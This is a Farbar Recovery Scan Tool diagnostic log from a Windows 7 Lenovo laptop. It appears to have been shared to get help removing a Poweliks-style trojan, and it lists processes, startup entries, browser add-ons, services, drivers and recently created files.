(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcSvc.exe
(Intel® Corporation) C:\Program Files\Intel\CAM\bin\CAMService.exe
(Conexant Systems Inc.) C:\Windows\System32\CxAudMsg64.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\CamMute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\micmute.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TPKNRSVC.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\lvvsst.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\vstskmgr.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\mfeann.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Conexant Systems, Inc.) C:\Windows\SysWOW64\SASrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\VIRTSCRL\virtscrl.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\ZOOM\TpScrex.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\TPONSCR.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\shtctky.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlk.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\naPrdMgr.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\AcDeskBandHlpr.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Lenovo.) C:\Windows\System32\TpShocks.exe
() C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Communications Utility\TpKnrres.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Access Connections\SvcGuiHlpr.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\HOTKEY\tpnumlkd.exe
(CANON INC.) C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\UdaterUI.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\Common Framework\McTray.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SRORest.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\VirusScan Enterprise\shstat.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPLpr.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PrivacyIconClient.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
() C:\Program Files (x86)\Lenovo\System Update\SUService.exe
(Lenovo) C:\Program Files\Lenovo\Lenovo Solution Center\LSCNotify.exe
(Intel Corporation) C:\Program Files\Intel\BluetoothHS\BTHSAmpPalService.exe
(Intel® Corporation) C:\Program Files\Intel\BluetoothHS\BTHSSecurityMgr.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Lenovo Group Limited) C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe
(Lenovo) C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe
(Lenovo) C:\Program Files (x86)\ThinkPad\Utilities\PWMDBSVC.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [TpShocks] => C:\Windows\system32\TpShocks.exe [380776 2011-01-14] (Lenovo.)
HKLM\...\Run: [ForteConfig] => C:\Program Files\Conexant\ForteConfig\fmapp.exe [49056 2010-10-26] ()
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [316032 2011-03-14] (Conexant systems, Inc.)
HKLM\...\Run: [LENOVO.TPKNRRES] => C:\Program Files\Lenovo\Communications Utility\TPKNRRES.exe [60920 2013-05-29] (Lenovo Group Limited)
HKLM\...\Run: [AcWin7Hlpr] => C:\Program Files (x86)\Lenovo\Access Connections\AcTBenabler.exe [63656 2016-02-19] (Lenovo)
HKLM-x32\...\Run: [IMSS] => C:\Program Files (x86)\Intel\Intel® Management Engine Components\IMSS\PIconStartup.exe [113656 2013-07-02] (Intel Corporation)
HKLM-x32\...\Run: [PWMTRV] => C:\Program Files (x86)\ThinkPad\Utilities\PWMTR64V.DLL [6422696 2016-04-14] (Lenovo Group Limited)
HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe /boot
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (CANON INC.)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [452272 2012-08-31] (CANON INC.)
HKLM-x32\...\Run: [McAfeeUpdaterUI] => C:\Program Files (x86)\McAfee\Common Framework\udaterui.exe [337440 2013-12-04] (McAfee, Inc.)
HKLM-x32\...\Run: [ShStatEXE] => C:\Program Files (x86)\McAfee\VirusScan Enterprise\SHSTAT.EXE [244080 2015-08-20] (McAfee, Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1156824 2016-09-16] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-10-23] (Google Inc.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{BBACEA73-8644-4A74-A026-251E28C5AC0C}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{F3EAF862-B2B2-4EA5-8BBC-6869F9E0D984}: [DhcpNameServer] 24.25.227.55 209.18.47.61

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=LENP&bmod=LENP
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
HKU\S-1-5-21-3902107189-2783423906-2191778952-1000\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://www.lenovo.com/welcome/thinkpad
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7LENP_enUS458
SearchScopes: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7LENP_enUS458
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files\Common Files\McAfee\SystemCore\ScriptSn.20151229232150.dll [2015-12-29] (McAfee, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\64bit\VIPAddOnForIE64.dll [2011-04-13] (Symantec Corporation)
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll [2014-07-07] (CANON INC.)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2015-02-06] (Oracle Corporation)
BHO-x32: scriptproxy -> {7DB2D5A0-7241-4E79-B68D-6309F01C5231} -> C:\Program Files (x86)\Common Files\McAfee\SystemCore\ScriptSn.20151229232150.dll [2015-12-29] (McAfee, Inc.)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2010-09-21] (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-28] (Google Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Symantec VIP Access Add-On -> {C63CD127-A1CB-4D49-A4F7-D6F88A917BE6} -> C:\Program Files (x86)\Symantec\VIP Access Client\VIPAddOnForIE.dll [2011-04-13] (Symantec Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2015-02-06] (Oracle Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll [2014-07-07] (CANON INC.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2016-04-28] (Google Inc.)
Toolbar: HKU\S-1-5-21-3902107189-2783423906-2191778952-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2016-04-28] (Google Inc.)
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} hxxp://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

FireFox:
========
FF ProfilePath: C:\Users\Wayne\AppData\Roaming\Mozilla\Firefox\Profiles\lh4xbcbb.default [2016-10-21]
FF DefaultSearchEngine: Mozilla\Firefox\Profiles\lh4xbcbb.default -> Google
FF DefaultSearchEngine.US: Mozilla\Firefox\Profiles\lh4xbcbb.default -> Google
FF SelectedSearchEngine: Mozilla\Firefox\Profiles\lh4xbcbb.default ->
FF Homepage: Mozilla\Firefox\Profiles\lh4xbcbb.default -> hxxps://www.google.com/
FF HKLM-x32\...\Firefox\Extensions: [VIP@verisign.com] - C:\Program Files (x86)\Symantec\VIP Access Client
FF Extension: (Symantec VIP Access Add-On) - C:\Program Files (x86)\Symantec\VIP Access Client [2011-10-23] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{D19CA586-DD6C-4a0a-96F8-14644F340D60}] - C:\Program Files (x86)\Common Files\McAfee\SystemCore
FF Extension: (McAfee ScriptScan for Firefox) - C:\Program Files (x86)\Common Files\McAfee\SystemCore [2015-12-29] [not signed]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_185.dll [2016-10-15] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_185.dll [2016-10-15] ()
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll [2011-11-30] (CANON INC.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Services\IPT\npIntelWebAPIIPT.dll [2014-07-09] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Services\IPT\npIntelWebAPIUpdater.dll [2014-07-09] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.76.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2015-02-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.76.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2015-02-06] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-09] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-30] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-30] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2016-10-01] (Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default [2016-10-20]
CHR Extension: (Google Slides) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-03-29]
CHR Extension: (Google Docs) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-29]
CHR Extension: (Google Drive) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-04-28]
CHR Extension: (YouTube) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-18]
CHR Extension: (Google Search) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-20]
CHR Extension: (Google Sheets) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-03-29]
CHR Extension: (Google Docs Offline) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-04-28]
CHR Extension: (Skype) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2016-10-15]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-28]
CHR Extension: (Gmail) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-20]
CHR Extension: (Chrome Media Router) - C:\Users\Wayne\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-10-15]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 CAMService; C:\Program Files\Intel\CAM\bin\CAMService.exe [1243344 2014-09-03] (Intel® Corporation)
S3 DozeSvc; C:\Program Files (x86)\ThinkPad\Utilities\DZSVC64.EXE [326160 2016-04-14] (Lenovo.)
S3 Lenovo EasyPlus Hotspot; C:\Program Files (x86)\Common Files\LENOVO\easyplussdk\bin\EPHotspot64.exe [619776 2015-01-15] (Lenovo)
R2 Lenovo.VIRTSCRLSVC; C:\Program Files\LENOVO\VIRTSCRL\lvvsst.exe [93032 2010-04-06] (Lenovo Group Limited)
S2 LPlatSvc; C:\Windows\system32\LPlatSvc.exe [710144 2016-09-06] (Lenovo.)
S3 LSC.Services.SystemService; C:\Program Files\Lenovo\Lenovo Solution Center\App\LSC.Services.SystemService.exe [273232 2016-04-20] (Lenovo)
R2 McAfeeFramework; C:\Program Files (x86)\McAfee\Common Framework\FrameworkService.exe [127520 2013-12-04] (McAfee, Inc.)
R2 McShield; C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe [262544 2015-12-29] (McAfee, Inc.)
R2 McTaskManager; C:\Program Files (x86)\McAfee\VirusScan Enterprise\vstskmgr.exe [208936 2015-08-20] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [254792 2015-12-29] (McAfee, Inc.)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [268192 2014-12-04] ()
R2 SROSVC; C:\Program Files (x86)\Lenovo\Screen Reading Optimizer\SROSVC.exe [446800 2012-03-05] (Lenovo Group Limited)
R3 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28544 2016-09-10] ()
R2 VIPAppService; C:\Program Files (x86)\Symantec\VIP Access Client\VIPAppService.exe [84088 2011-04-13] (Symantec Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-26] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3820960 2014-12-04] (Intel® Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
S4 epp; C:\EEK\bin64\epp.sys [116944 2016-06-30] (Emsisoft Ltd)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [412440 2015-12-29] (McAfee, Inc.)
R3 mfeaacsk; C:\Windows\System32\drivers\mfeaacsk.sys [64416 2015-12-29] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [347800 2015-12-29] (McAfee, Inc.)
U3 mfeavfk01; no ImagePath
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [496888 2015-12-29] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [875928 2015-12-29] (McAfee, Inc.)
R3 mfeplk; C:\Windows\System32\drivers\mfeplk.sys [66080 2015-12-29] (McAfee, Inc.)
S3 mferkdet; C:\Windows\System32\drivers\mferkdet.sys [114880 2015-12-29] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [344704 2015-12-29] (McAfee, Inc.)
S3 pmxdrv; C:\Windows\system32\drivers\pmxdrv.sys [31152 2011-10-23] ()
R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [45296 2014-07-28] (Synaptics Incorporated)
R3 usb3Hub; C:\Windows\System32\DRIVERS\usb3Hub.sys [206744 2013-06-20] (Windows ® Win 7 DDK provider)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-10-21 22:02 - 2016-10-21 22:03 - 00022015 _____ C:\Users\Wayne\Desktop\FRST.txt
2016-10-21 22:00 - 2016-10-21 22:00 - 00002288 _____ C:\Users\Wayne\Desktop\Quarantine_161021-215939.txt
2016-10-21 21:35 - 2016-10-21 21:35 - 00000240 _____ C:\Users\Wayne\Desktop\Script.reg
2016-10-21 21:29 - 2016-10-21 22:00 - 00000000 ____D C:\EEK
2016-10-21 21:27 - 2016-10-21 21:28 - 270832032 _____ C:\Users\Wayne\Desktop\EmsisoftEmergencyKit.exe
2016-10-20 23:48 - 2016-10-20 23:48 - 00000285 _____ C:\Users\Wayne\Desktop\KEEP firefox shortcut icons on my desktop all went blank Solved - Page 2 - Windows 7 Help Forums.URL
2016-10-20 23:35 - 2016-10-20 23:35 - 00000000 ____D C:\Users\Wayne\AppData\Local\Apps\2.0
2016-10-20 23:04 - 2016-10-21 21:25 - 00000000 ____D C:\Users\Wayne\Desktop\4th try
2016-10-20 22:01 - 2016-09-15 04:56 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\UtcResources.dll
2016-10-20 22:01 - 2016-09-13 05:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2016-10-20 22:01 - 2016-09-13 05:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2016-10-20 22:01 - 2016-09-09 08:20 - 00756736 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-10-20 22:01 - 2016-09-09 08:00 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-10-20 22:01 - 2016-08-22 06:19 - 01386496 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-10-20 21:52 - 2016-10-20 22:39 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-10-20 20:42 - 2016-10-20 20:43 - 00000000 ____D C:\Users\Wayne\Desktop\3rd try
2016-10-19 18:58 - 2016-10-19 18:59 - 00000000 ____D C:\Users\Wayne\Desktop\2nd try
2016-10-18 20:37 - 2016-10-20 20:52 - 00000000 ____D C:\Users\Wayne\AppData\Local\1282a1
2016-10-18 20:37 - 2016-10-18 20:37 - 00000000 ____D C:\Users\Wayne\AppData\Roaming\403522
2016-10-18 19:55 - 2016-10-18 20:00 - 00000000 ____D C:\Users\Wayne\Desktop\1st try
2016-10-16 09:37 - 2016-10-16 09:37 - 00000310 _____ C:\Users\Wayne\Desktop\Preparation Guide For Use Before Using Malware Removal Tools and Requesting Help - Virus, Trojan, Spyware, and Malware Remov.URL
2016-10-16 00:25 - 2016-10-16 00:25 - 02030536 _____ (Bleeping Computer, LLC) C:\Users\Wayne\Desktop\iExplore.exe
2016-10-15 23:50 - 2016-10-15 23:50 - 00224968 _____ (ESET) C:\Users\Wayne\Desktop\ESETPoweliksCleaner.exe
2016-10-15 23:47 - 2016-10-15 23:47 - 01577380 _____ C:\Users\Wayne\Desktop\How to remove the Poweliks Trojan (Removal Guide).pdf
2016-10-15 23:41 - 2016-10-15 23:41 - 00000264 _____ C:\Users\Wayne\Desktop\How to remove the Poweliks Trojan (Removal Guide).URL
2016-10-15 23:39 - 2016-10-15 23:39 - 00000287 _____ C:\Users\Wayne\Desktop\Infection by Trojan-PoweLike!bat via bogus Firefox update - Virus, Trojan, Spyware, and Malware Removal Logs.URL
2016-10-15 23:18 - 2016-10-21 22:02 - 00000000 ____D C:\FRST
2016-10-15 23:15 - 2016-10-18 20:25 - 02407424 _____ (Farbar) C:\Users\Wayne\Desktop\FRST64.exe
2016-10-15 23:13 - 2016-10-15 23:13 - 00000277 _____ C:\Users\Wayne\Desktop\FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials.URL
2016-10-15 21:41 - 2016-10-15 22:45 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-10-15 21:40 - 2016-10-15 21:40 - 00001117 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-10-15 21:40 - 2016-10-15 21:40 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-10-15 21:40 - 2016-03-10 14:09 - 00064896 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2016-10-15 21:40 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2016-10-15 21:40 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2016-10-15 18:33 - 2016-10-15 18:33 - 22851472 _____ (Malwarebytes ) C:\Users\Wayne\Desktop\mbam-setup-2.2.1.1043.exe
2016-10-15 17:05 - 2016-10-15 17:05 - 00000102 _____ C:\Users\Wayne\Desktop\Trojan-Powe!bat infecting my PC - Resolved Malware Removal Logs - Malwarebytes Forums.url
2016-10-15 17:00 - 2016-10-15 17:00 - 00000168 _____ C:\Users\Wayne\Desktop\virusscan on access trojan-powellike!nk keeps appearing - Google Search.url
2016-10-15 16:58 - 2016-10-15 16:58 - 00000084 _____ C:\Users\Wayne\Desktop\On-Access Scan Messages - Trojan-PoweLike!bat -McAfee Communities.url
2016-10-15 16:56 - 2016-10-15 16:56 - 00000173 _____ C:\Users\Wayne\Desktop\Threat Advisory- Trojan-Powelike.url
2016-10-15 15:57 - 2016-10-15 15:57 - 00000200 _____ C:\Users\Wayne\Desktop\deturl.com - download videos from YouTube..URL
2016-10-15 15:28 - 2016-09-30 10:13 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
